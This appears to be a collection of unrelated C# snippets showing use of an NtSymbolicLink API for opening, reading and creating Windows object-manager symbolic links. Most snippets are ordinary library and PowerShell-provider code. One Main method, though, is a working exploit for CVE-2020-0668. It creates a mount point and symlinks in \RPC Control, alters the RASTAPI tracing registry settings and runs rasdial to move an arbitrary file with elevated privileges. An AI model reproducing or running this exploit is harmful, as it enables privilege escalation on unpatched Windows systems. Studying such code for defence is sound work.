/// <summary> /// Method to create an object from a set of object attributes. /// </summary> /// <param name="obj_attributes">The object attributes to create/open from.</param> /// <returns>The newly created object.</returns> protected override object CreateObject(ObjectAttributes obj_attributes) { using (NtSymbolicLink link = NtSymbolicLink.Open(obj_attributes, SymbolicLinkAccessRights.Query)) { return(link.Target); } }
private void PopulateData() { if (!_data_populated) { _data_populated = true; if (NtObject.CanOpenType(TypeName)) { try { using (NtObject obj = ToObject()) { if (obj.IsAccessMaskGranted(GenericAccessRights.ReadControl)) { _sd = obj.SecurityDescriptor; } NtSymbolicLink link = obj as NtSymbolicLink; if (link != null && link.IsAccessGranted(SymbolicLinkAccessRights.Query)) { _symlink_target = link.Target; } _maximum_granted_access = obj.GrantedAccessMask.ToSpecificAccess(obj.NtType.AccessRightsType); } } catch { } } } }
public static string ReadSymlink(string symlink_path) { using (NtSymbolicLink symlink = NtSymbolicLink.Open(symlink_path, null, SymbolicLinkAccessRights.Query)) { return(symlink.Target); } }
private string MapWin32ToDevicePath() { string path = NtFileUtils.DosFileNameToNt(SymbolicLinkPath); string final_component = string.Empty; // Strip off any remaining path. if (path.StartsWith(@"\??\")) { int slash_index = path.IndexOf('\\', 4); if (slash_index >= 0) { final_component = path.Substring(slash_index); path = path.Substring(0, slash_index); } } using (var link = NtSymbolicLink.Open(path, null, SymbolicLinkAccessRights.Query, false)) { if (link.IsSuccess) { path = link.Result.Target; } } return(path + final_component); }
public override NtObject NewItem(string relative_path, string item_type_name, object new_item_value) { switch (item_type_name.ToLower()) { case "event": return(NtEvent.Create(relative_path, _dir, EventType.NotificationEvent, false)); case "directory": return(NtDirectory.Create(relative_path, _dir, DirectoryAccessRights.MaximumAllowed)); case "symboliclink": case "link": if (new_item_value == null) { throw new ArgumentNullException(nameof(new_item_value), "Must specify value for the symbolic link"); } return(NtSymbolicLink.Create(relative_path, _dir, new_item_value.ToString())); case "mutant": return(NtMutant.Create(relative_path, _dir, false)); case "semaphore": int max_count = 1; if (new_item_value != null) { max_count = Convert.ToInt32(new_item_value); } return(NtSemaphore.Create(relative_path, _dir, 0, max_count)); default: throw new ArgumentException($"Can't create new object of type {item_type_name}"); } }
private NtResult <NtSymbolicLink> CreateSymlink(int session_id, string name, bool throw_on_error) { using (var obja = CreateObjectAttributes(session_id, name)) { return(NtSymbolicLink.Create(obja, SymbolicLinkAccessRights.MaximumAllowed, GetSessionString(_session_id, name), throw_on_error)); } }
/// <summary> /// Method to create an object from a set of object attributes. /// </summary> /// <param name="obj_attributes">The object attributes to create/open from.</param> /// <returns>The newly created object.</returns> protected override object CreateObject(ObjectAttributes obj_attributes) { if (TargetPath == null) { throw new ArgumentNullException("TargetPath"); } return(NtSymbolicLink.Create(obj_attributes, Access, TargetPath)); }
/// <summary> /// Overridden method to create a new item. /// </summary> /// <param name="path">The drive path to create.</param> /// <param name="itemTypeName">The NT object type to create.</param> /// <param name="newItemValue">Additional item value data.</param> protected override void NewItem(string path, string itemTypeName, object newItemValue) { if (itemTypeName == null) { throw new ArgumentNullException("itemTypeName", "Must specify a typename"); } NtObject obj = null; string relative_path = GetRelativePath(PSPathToNT(path)); bool container = false; switch (itemTypeName.ToLower()) { case "event": obj = NtEvent.Create(relative_path, GetDrive().DirectoryRoot, EventType.NotificationEvent, false); break; case "directory": obj = NtDirectory.Create(relative_path, GetDrive().DirectoryRoot, DirectoryAccessRights.MaximumAllowed); container = true; break; case "symboliclink": case "link": if (newItemValue == null) { throw new ArgumentNullException("newItemValue", "Must specify value for the symbolic link"); } obj = NtSymbolicLink.Create(relative_path, GetDrive().DirectoryRoot, newItemValue.ToString()); break; case "mutant": obj = NtMutant.Create(relative_path, GetDrive().DirectoryRoot, false); break; case "semaphore": int max_count = 1; if (newItemValue != null) { max_count = Convert.ToInt32(newItemValue); } obj = NtSemaphore.Create(relative_path, GetDrive().DirectoryRoot, 0, max_count); break; default: throw new ArgumentException(String.Format("Can't create new object of type {0}", itemTypeName)); } WriteItemObject(obj, path, container); }
public static string ReadSymlink(string symlink_path) { try { using (NtSymbolicLink symlink = NtSymbolicLink.Open(symlink_path, null, SymbolicLinkAccessRights.Query)) { return(symlink.Target); } } catch (NtException ex) { throw ex.AsWin32Exception(); } }
static string GetSymlinkTarget(ObjectDirectoryEntry entry) { try { using (NtSymbolicLink link = NtSymbolicLink.Open(entry.FullPath, null)) { return(link.Target); } } catch (NtException) { return(""); } }
/// <summary> /// Method to create an object from a set of object attributes. /// </summary> /// <param name="obj_attributes">The object attributes to create/open from.</param> /// <returns>The newly created object.</returns> protected override object CreateObject(ObjectAttributes obj_attributes) { if (TargetPath == null) { throw new ArgumentNullException("TargetPath"); } if (Global) { using (var link = NtSymbolicLink.Create(obj_attributes, Access | SymbolicLinkAccessRights.Set, TargetPath)) { link.SetGlobalLink(); return(link.Duplicate()); } } return(NtSymbolicLink.Create(obj_attributes, Access, TargetPath)); }
/// <summary> /// Method to create an object from a set of object attributes. /// </summary> /// <param name="obj_attributes">The object attributes to create/open from.</param> /// <returns>The newly created object.</returns> protected override object CreateObject(ObjectAttributes obj_attributes) { return(NtSymbolicLink.Open(obj_attributes, Access)); }
static void Main(string[] args) { if (args.Length != 2) { Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation."); Console.WriteLine($"Usage: inFilePath outFilePath"); return; } String inDLLPath = args[0]; String outDllPath = args[1]; if (!File.Exists(inDLLPath)) { Console.WriteLine($@"[!] Cannot find {inDLLPath}!"); return; } Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath)); bool checkVuln = isVulnerable(); if (!checkVuln) { Console.WriteLine("[-] NOT VULNERABLE: Hotfix KB4532693 Found"); return; } else { Console.WriteLine("[+] VULNERABLE: Hotfix KB4532693 Not Found"); } String tempDirectory = GetTemporaryDirectory(); const string ObjectDirectory = @"\RPC Control"; Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}"); string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory); NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, ""); Console.WriteLine("[+] Creating symbol links"); var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}"); var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}"); Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration."); Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect"); UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000); Thread.Sleep(5000); // might have to sleep for the update to take effect string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk"); Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}"); File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook); using (Process p = new Process()) { p.StartInfo.FileName = "rasdial"; p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.Start(); p.WaitForExit(); } Console.WriteLine("[+] Cleaning up"); File.Delete(phonebookPath); Directory.Delete(tempDirectory, true); logFileSymlnk.Close(); oldFileSymlnk.Close(); UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values Console.WriteLine("[+] Done!"); }
protected override sealed NtResult <NtSymbolicLink> OpenInternal(ObjectAttributes obj_attributes, SymbolicLinkAccessRights desired_access, bool throw_on_error) { return(NtSymbolicLink.Open(obj_attributes, desired_access, throw_on_error)); }